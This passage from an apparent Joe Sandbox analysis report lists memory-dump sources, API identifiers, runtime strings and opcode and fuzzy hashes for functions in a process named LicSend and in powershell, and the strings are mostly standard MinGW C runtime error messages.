• Associated: 00000007.00000002.2176010115.00007FF7D3DCE000.00000008.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.2176060782.00007FF7D3DCF000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_7ff7d3b90000_LicSend.jbxd
Yara matches
Similarity
• API ID: CriticalSection$EnterLeavecalloc
• String ID: !dso || dso == &__dso_handle$../../src/mingw-w64/mingw-w64-crt/crt/tls_atexit.c
• API String ID: 876395260-799109717
• Opcode ID: fcf295b5aa8768ae6ce15292c97890cb21af645081a82375fce64ba212e4556d
• Instruction ID: 520ae0392c95a017b16c1e86d6b9671d116f87d78b30b2a463f4c4e7f48651b3
• Opcode Fuzzy Hash: fcf295b5aa8768ae6ce15292c97890cb21af645081a82375fce64ba212e4556d
• Instruction Fuzzy Hash: 52013C21B1960649FBD1AB95F9402BCE3A0AF0C790FC44036D94CA3395EE3CE99587A0
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    • Unknown pseudo relocation protocol version %d., xrefs: 00007FF7D3B99EE2
                                                                                                    • Unknown pseudo relocation bit size %d., xrefs: 00007FF7D3B99EBA
                                                                                                    • %d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p., xrefs: 00007FF7D3B99ED3
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.2175410318.00007FF7D3B91000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7D3B90000, based on PE: true
                                                                                                    • Associated: 00000007.00000002.2175347825.00007FF7D3B90000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                    • Associated: 00000007.00000002.2175439723.00007FF7D3BA1000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                    • Associated: 00000007.00000002.2175488277.00007FF7D3BA2000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                    • Associated: 00000007.00000002.2175579159.00007FF7D3BA3000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                    • Associated: 00000007.00000002.2175654425.00007FF7D3BCC000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                    • Associated: 00000007.00000002.2175793991.00007FF7D3DC4000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                    • Associated: 00000007.00000002.2175918663.00007FF7D3DC6000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                    • Associated: 00000007.00000002.2175983789.00007FF7D3DCB000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                    • Associated: 00000007.00000002.2176010115.00007FF7D3DCE000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                    • Associated: 00000007.00000002.2176060782.00007FF7D3DCF000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_7ff7d3b90000_LicSend.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ProtectVirtual
                                                                                                    • String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.$%d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p.
                                                                                                    • API String ID: 544645111-1286557213
                                                                                                    • Opcode ID: 0492cd2b0110fbee1511658604c500477bf53dc288f0a9f6389e200b583ff242
                                                                                                    • Instruction ID: 900daa56146828d10e689a2ca733880e524c4e0ec4e019684bacff43fc8af079
                                                                                                    • Opcode Fuzzy Hash: 0492cd2b0110fbee1511658604c500477bf53dc288f0a9f6389e200b583ff242
                                                                                                    • Instruction Fuzzy Hash: 1571FF22F1AA0685EEE0AB2195406BCF6A0BF45794FD44237C9AD277C8DE3DE445C770
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.2175410318.00007FF7D3B91000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7D3B90000, based on PE: true
                                                                                                    • Associated: 00000007.00000002.2175347825.00007FF7D3B90000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                    • Associated: 00000007.00000002.2175439723.00007FF7D3BA1000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                    • Associated: 00000007.00000002.2175488277.00007FF7D3BA2000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                    • Associated: 00000007.00000002.2175579159.00007FF7D3BA3000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                    • Associated: 00000007.00000002.2175654425.00007FF7D3BCC000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                    • Associated: 00000007.00000002.2175793991.00007FF7D3DC4000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                    • Associated: 00000007.00000002.2175918663.00007FF7D3DC6000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                    • Associated: 00000007.00000002.2175983789.00007FF7D3DCB000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                    • Associated: 00000007.00000002.2176010115.00007FF7D3DCE000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                    • Associated: 00000007.00000002.2176060782.00007FF7D3DCF000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_7ff7d3b90000_LicSend.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Byte$CharLeadMultiWide
                                                                                                    • String ID:
                                                                                                    • API String ID: 2561704868-0
                                                                                                    • Opcode ID: 6a4731a88aa3662155cafbc417d112421a3473268a0349ef87fd8546545edb20
                                                                                                    • Instruction ID: 53a78afbc80c6a5970cceafe19d8715733f0811634e48b948a70712e630e9f61
                                                                                                    • Opcode Fuzzy Hash: 6a4731a88aa3662155cafbc417d112421a3473268a0349ef87fd8546545edb20
                                                                                                    • Instruction Fuzzy Hash: AC31B573A0D28186E7A05F25B4103ADFA90BB847A5FD84136DAC8977D4CE7DD5458B20
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.2175410318.00007FF7D3B91000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7D3B90000, based on PE: true
                                                                                                    • Associated: 00000007.00000002.2175347825.00007FF7D3B90000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                    • Associated: 00000007.00000002.2175439723.00007FF7D3BA1000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                    • Associated: 00000007.00000002.2175488277.00007FF7D3BA2000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                    • Associated: 00000007.00000002.2175579159.00007FF7D3BA3000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                    • Associated: 00000007.00000002.2175654425.00007FF7D3BCC000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                    • Associated: 00000007.00000002.2175793991.00007FF7D3DC4000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                    • Associated: 00000007.00000002.2175918663.00007FF7D3DC6000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                    • Associated: 00000007.00000002.2175983789.00007FF7D3DCB000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                    • Associated: 00000007.00000002.2176010115.00007FF7D3DCE000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                    • Associated: 00000007.00000002.2176060782.00007FF7D3DCF000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_7ff7d3b90000_LicSend.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: AllocCreateErrorLastSemaphoreabort
                                                                                                    • String ID:
                                                                                                    • API String ID: 4146797221-0
                                                                                                    • Opcode ID: dfb1d64bbf729df8a88a55cc0c1d5f287949e4b4695e07322a7da532e3dc815e
                                                                                                    • Instruction ID: 5ed8cff792a643ed6065e8a9acc16a975f93556e444ced464820da571eb2f49b
                                                                                                    • Opcode Fuzzy Hash: dfb1d64bbf729df8a88a55cc0c1d5f287949e4b4695e07322a7da532e3dc815e
                                                                                                    • Instruction Fuzzy Hash: B5F08231E1E50386F7D4BBA46C4803DE6A15F09310FD00237D46D621E0DF3CA5598B70
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.2175410318.00007FF7D3B91000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7D3B90000, based on PE: true
                                                                                                    • Associated: 00000007.00000002.2175347825.00007FF7D3B90000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                    • Associated: 00000007.00000002.2175439723.00007FF7D3BA1000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                    • Associated: 00000007.00000002.2175488277.00007FF7D3BA2000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                    • Associated: 00000007.00000002.2175579159.00007FF7D3BA3000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                    • Associated: 00000007.00000002.2175654425.00007FF7D3BCC000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                    • Associated: 00000007.00000002.2175793991.00007FF7D3DC4000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                    • Associated: 00000007.00000002.2175918663.00007FF7D3DC6000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                    • Associated: 00000007.00000002.2175983789.00007FF7D3DCB000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                    • Associated: 00000007.00000002.2176010115.00007FF7D3DCE000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                    • Associated: 00000007.00000002.2176060782.00007FF7D3DCF000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_7ff7d3b90000_LicSend.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: fprintf
                                                                                                    • String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                                                    • API String ID: 383729395-3474627141
                                                                                                    • Opcode ID: 93020a064968560fb6e8fd87e9f8ed2462cc39105c2bba8f145e5cfab8ad68d5
                                                                                                    • Instruction ID: 61c707bd97ac7d93407e28d5c1453a418098293375613a7b632bf2864fc66685
                                                                                                    • Opcode Fuzzy Hash: 93020a064968560fb6e8fd87e9f8ed2462cc39105c2bba8f145e5cfab8ad68d5
                                                                                                    • Instruction Fuzzy Hash: 87017022918E8885D6529F5CD8011EEF375FF5D79AFA85326EA8C26220DF29D543C710
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.2175410318.00007FF7D3B91000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7D3B90000, based on PE: true
                                                                                                    • Associated: 00000007.00000002.2175347825.00007FF7D3B90000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                    • Associated: 00000007.00000002.2175439723.00007FF7D3BA1000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                    • Associated: 00000007.00000002.2175488277.00007FF7D3BA2000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                    • Associated: 00000007.00000002.2175579159.00007FF7D3BA3000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                    • Associated: 00000007.00000002.2175654425.00007FF7D3BCC000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                    • Associated: 00000007.00000002.2175793991.00007FF7D3DC4000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                    • Associated: 00000007.00000002.2175918663.00007FF7D3DC6000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                    • Associated: 00000007.00000002.2175983789.00007FF7D3DCB000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                    • Associated: 00000007.00000002.2176010115.00007FF7D3DCE000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                    • Associated: 00000007.00000002.2176060782.00007FF7D3DCF000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_7ff7d3b90000_LicSend.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: fprintf
                                                                                                    • String ID: The result is too small to be represented (UNDERFLOW)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                                                    • API String ID: 383729395-2187435201
                                                                                                    • Opcode ID: 4edd7fb680f034d8635567aadb5358d9821b8122c7e83baa35e57ab2eec7e1c4
                                                                                                    • Instruction ID: 21cef232b3ce3ddf2af7254e60aa15b4bc2f9f5982f0bd84d74586b8ea92dd3c
                                                                                                    • Opcode Fuzzy Hash: 4edd7fb680f034d8635567aadb5358d9821b8122c7e83baa35e57ab2eec7e1c4
                                                                                                    • Instruction Fuzzy Hash: DEF06213919E4881D2429F18A4000EEF371FF4DB99F985336EB8D36165DF28D6438750
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.2175410318.00007FF7D3B91000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7D3B90000, based on PE: true
                                                                                                    • Associated: 00000007.00000002.2175347825.00007FF7D3B90000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                    • Associated: 00000007.00000002.2175439723.00007FF7D3BA1000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                    • Associated: 00000007.00000002.2175488277.00007FF7D3BA2000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                    • Associated: 00000007.00000002.2175579159.00007FF7D3BA3000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                    • Associated: 00000007.00000002.2175654425.00007FF7D3BCC000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                    • Associated: 00000007.00000002.2175793991.00007FF7D3DC4000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                    • Associated: 00000007.00000002.2175918663.00007FF7D3DC6000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                    • Associated: 00000007.00000002.2175983789.00007FF7D3DCB000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                    • Associated: 00000007.00000002.2176010115.00007FF7D3DCE000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                    • Associated: 00000007.00000002.2176060782.00007FF7D3DCF000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_7ff7d3b90000_LicSend.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: fprintf
                                                                                                    • String ID: Total loss of significance (TLOSS)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                                                    • API String ID: 383729395-4273532761
                                                                                                    • Opcode ID: 0474bf48b120e00db24a61aa5c9821339e380a1df4cbc1804bdca3b933310097
                                                                                                    • Instruction ID: d27e358daf6701dd512700393da0603ca2d8c75c43b3d4ecebf59a97686bfaa2
                                                                                                    • Opcode Fuzzy Hash: 0474bf48b120e00db24a61aa5c9821339e380a1df4cbc1804bdca3b933310097
                                                                                                    • Instruction Fuzzy Hash: 84F06213919E4881D2429F28A4000EEF371FF4DB99F995336EB8D36525DF28D6438750
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.2175410318.00007FF7D3B91000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7D3B90000, based on PE: true
                                                                                                    • Associated: 00000007.00000002.2175347825.00007FF7D3B90000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                    • Associated: 00000007.00000002.2175439723.00007FF7D3BA1000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                    • Associated: 00000007.00000002.2175488277.00007FF7D3BA2000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                    • Associated: 00000007.00000002.2175579159.00007FF7D3BA3000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                    • Associated: 00000007.00000002.2175654425.00007FF7D3BCC000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                    • Associated: 00000007.00000002.2175793991.00007FF7D3DC4000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                    • Associated: 00000007.00000002.2175918663.00007FF7D3DC6000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                    • Associated: 00000007.00000002.2175983789.00007FF7D3DCB000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                    • Associated: 00000007.00000002.2176010115.00007FF7D3DCE000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                    • Associated: 00000007.00000002.2176060782.00007FF7D3DCF000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_7ff7d3b90000_LicSend.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: fprintf
                                                                                                    • String ID: Partial loss of significance (PLOSS)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                                                    • API String ID: 383729395-4283191376
                                                                                                    • Opcode ID: fd46a65cf543c8bef65525f8ca04d9d039481cfdd0e4d9241d127785d181cc6a
                                                                                                    • Instruction ID: 0b4686b59346d1c326c372efca00c57d5c74fe7da457936a08b5641f3f26220b
                                                                                                    • Opcode Fuzzy Hash: fd46a65cf543c8bef65525f8ca04d9d039481cfdd0e4d9241d127785d181cc6a
                                                                                                    • Instruction Fuzzy Hash: C0F06213919E4881D2429F18A4000EEF371FF4DB99F985336EB8D36565DF28D6438750
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.2175410318.00007FF7D3B91000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7D3B90000, based on PE: true
                                                                                                    • Associated: 00000007.00000002.2175347825.00007FF7D3B90000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                    • Associated: 00000007.00000002.2175439723.00007FF7D3BA1000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                    • Associated: 00000007.00000002.2175488277.00007FF7D3BA2000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                    • Associated: 00000007.00000002.2175579159.00007FF7D3BA3000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                    • Associated: 00000007.00000002.2175654425.00007FF7D3BCC000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                    • Associated: 00000007.00000002.2175793991.00007FF7D3DC4000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                    • Associated: 00000007.00000002.2175918663.00007FF7D3DC6000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                    • Associated: 00000007.00000002.2175983789.00007FF7D3DCB000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                    • Associated: 00000007.00000002.2176010115.00007FF7D3DCE000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                    • Associated: 00000007.00000002.2176060782.00007FF7D3DCF000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_7ff7d3b90000_LicSend.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: fprintf
                                                                                                    • String ID: Argument singularity (SIGN)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                                                    • API String ID: 383729395-2468659920
                                                                                                    • Opcode ID: fd8ba92c9eaa798f6a7db2cb73e9ab13292664d6d5b349ad265193585fa497c3
                                                                                                    • Instruction ID: d82e90fd571c8c67eab17864abca7571e3cb1580cbe83f0d7b1e14a9282b6a93
                                                                                                    • Opcode Fuzzy Hash: fd8ba92c9eaa798f6a7db2cb73e9ab13292664d6d5b349ad265193585fa497c3
                                                                                                    • Instruction Fuzzy Hash: DFF06253919E4881D2429F18A4000EEF371FF5DB99F985336EB8D36125DF28D6438760
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.2175410318.00007FF7D3B91000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7D3B90000, based on PE: true
                                                                                                    • Associated: 00000007.00000002.2175347825.00007FF7D3B90000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                    • Associated: 00000007.00000002.2175439723.00007FF7D3BA1000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                    • Associated: 00000007.00000002.2175488277.00007FF7D3BA2000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                    • Associated: 00000007.00000002.2175579159.00007FF7D3BA3000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                    • Associated: 00000007.00000002.2175654425.00007FF7D3BCC000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                    • Associated: 00000007.00000002.2175793991.00007FF7D3DC4000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                    • Associated: 00000007.00000002.2175918663.00007FF7D3DC6000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                    • Associated: 00000007.00000002.2175983789.00007FF7D3DCB000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                    • Associated: 00000007.00000002.2176010115.00007FF7D3DCE000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                    • Associated: 00000007.00000002.2176060782.00007FF7D3DCF000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_7ff7d3b90000_LicSend.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: fprintf
                                                                                                    • String ID: Overflow range error (OVERFLOW)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                                                    • API String ID: 383729395-4064033741
                                                                                                    • Opcode ID: 15bfff8cb211ccaf6a46a3ef0c6b7ed7caa623ed6f052883c5e405bffc4a8cce
                                                                                                    • Instruction ID: b1af7cba33892680a7841ff0f9cc566e72e60ea881dce295a38d39220c660dd5
                                                                                                    • Opcode Fuzzy Hash: 15bfff8cb211ccaf6a46a3ef0c6b7ed7caa623ed6f052883c5e405bffc4a8cce
                                                                                                    • Instruction Fuzzy Hash: ACF06213919E8881D2429F18A4000EEF371FF8DB99F985336EB8D36565DF28D6438750
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.2175410318.00007FF7D3B91000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7D3B90000, based on PE: true
                                                                                                    • Associated: 00000007.00000002.2175347825.00007FF7D3B90000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                    • Associated: 00000007.00000002.2175439723.00007FF7D3BA1000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                    • Associated: 00000007.00000002.2175488277.00007FF7D3BA2000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                    • Associated: 00000007.00000002.2175579159.00007FF7D3BA3000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                    • Associated: 00000007.00000002.2175654425.00007FF7D3BCC000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                    • Associated: 00000007.00000002.2175793991.00007FF7D3DC4000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                    • Associated: 00000007.00000002.2175918663.00007FF7D3DC6000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                    • Associated: 00000007.00000002.2175983789.00007FF7D3DCB000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                    • Associated: 00000007.00000002.2176010115.00007FF7D3DCE000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                    • Associated: 00000007.00000002.2176060782.00007FF7D3DCF000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_7ff7d3b90000_LicSend.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: fprintf
                                                                                                    • String ID: Argument domain error (DOMAIN)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                                                    • API String ID: 383729395-2713391170
                                                                                                    • Opcode ID: 729c9d76acc960e123572dbabc208572d3d77fcceb50ff850dfa89d492672346
                                                                                                    • Instruction ID: fb8e2f1d36a1cf65439aff283597d37200d4d9761f9d66631271c9d0e5f409d7
                                                                                                    • Opcode Fuzzy Hash: 729c9d76acc960e123572dbabc208572d3d77fcceb50ff850dfa89d492672346
                                                                                                    • Instruction Fuzzy Hash: E9F06212918E4881D2429F18A4000AAF371FF4DB99F985326EF8D36525DF28D5438710
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.2175410318.00007FF7D3B91000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7D3B90000, based on PE: true
                                                                                                    • Associated: 00000007.00000002.2175347825.00007FF7D3B90000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                    • Associated: 00000007.00000002.2175439723.00007FF7D3BA1000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                    • Associated: 00000007.00000002.2175488277.00007FF7D3BA2000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                    • Associated: 00000007.00000002.2175579159.00007FF7D3BA3000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                    • Associated: 00000007.00000002.2175654425.00007FF7D3BCC000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                    • Associated: 00000007.00000002.2175793991.00007FF7D3DC4000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                    • Associated: 00000007.00000002.2175918663.00007FF7D3DC6000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                    • Associated: 00000007.00000002.2175983789.00007FF7D3DCB000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                    • Associated: 00000007.00000002.2176010115.00007FF7D3DCE000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                    • Associated: 00000007.00000002.2176060782.00007FF7D3DCF000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_7ff7d3b90000_LicSend.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: memsetwcscatwcscpywcslen
                                                                                                    • String ID:
                                                                                                    • API String ID: 468205783-0
                                                                                                    • Opcode ID: d78c7754e5141f363246a86ab4ff1f76819f9376f02b7aa2f4ce74b4d41ef8d2
                                                                                                    • Instruction ID: 44b45ef71bcfdb7c33726431cf8e5611165f76a17cccff9b8a087daf417619ed
                                                                                                    • Opcode Fuzzy Hash: d78c7754e5141f363246a86ab4ff1f76819f9376f02b7aa2f4ce74b4d41ef8d2
                                                                                                    • Instruction Fuzzy Hash: 9721D712A19B8545E7A1EF26E81436EF660BB59784FC88136EE8C4B791EF7CD040C360
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.2175410318.00007FF7D3B91000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7D3B90000, based on PE: true
                                                                                                    • Associated: 00000007.00000002.2175347825.00007FF7D3B90000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                    • Associated: 00000007.00000002.2175439723.00007FF7D3BA1000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                    • Associated: 00000007.00000002.2175488277.00007FF7D3BA2000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                    • Associated: 00000007.00000002.2175579159.00007FF7D3BA3000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                    • Associated: 00000007.00000002.2175654425.00007FF7D3BCC000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                    • Associated: 00000007.00000002.2175793991.00007FF7D3DC4000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                    • Associated: 00000007.00000002.2175918663.00007FF7D3DC6000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                    • Associated: 00000007.00000002.2175983789.00007FF7D3DCB000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                    • Associated: 00000007.00000002.2176010115.00007FF7D3DCE000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                    • Associated: 00000007.00000002.2176060782.00007FF7D3DCF000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_7ff7d3b90000_LicSend.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CriticalSection$EnterLeavefree
                                                                                                    • String ID:
                                                                                                    • API String ID: 4020351045-0
                                                                                                    • Opcode ID: f08af047a3a9549d0bf6df4144a8100a2ada89aaca3a8e220c562b1c483d70f5
                                                                                                    • Instruction ID: 5cafa864f396b08700137da7a04e396561ebcc91dc39674656d2ef4c74ec3d5f
                                                                                                    • Opcode Fuzzy Hash: f08af047a3a9549d0bf6df4144a8100a2ada89aaca3a8e220c562b1c483d70f5
                                                                                                    • Instruction Fuzzy Hash: DC115E21F2E60386FAD4AB90D88013CF3A0AF98B80BD44033C55D67260DF3DE96597B0
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000011.00000002.2164841753.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_17_2_7ffd9b880000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 102289505dbfbd781b1738947b12244bad7122a8a7aaa9e7d132e25b4d829eab
                                                                                                    • Instruction ID: 488aad71f3db09bcbe193f19acdd60316d5c1f3a9483b82b2a1b07c3ebe14462
                                                                                                    • Opcode Fuzzy Hash: 102289505dbfbd781b1738947b12244bad7122a8a7aaa9e7d132e25b4d829eab
                                                                                                    • Instruction Fuzzy Hash: 70123B32B0EA9D4FEB55EB9CD8619E97BE0EF59314F0941BBC059C71A3DD34A8428780
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000011.00000002.2165917113.00007FFD9B950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B950000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_17_2_7ffd9b950000_powershell.jbxd
                                                                                                    Similarity
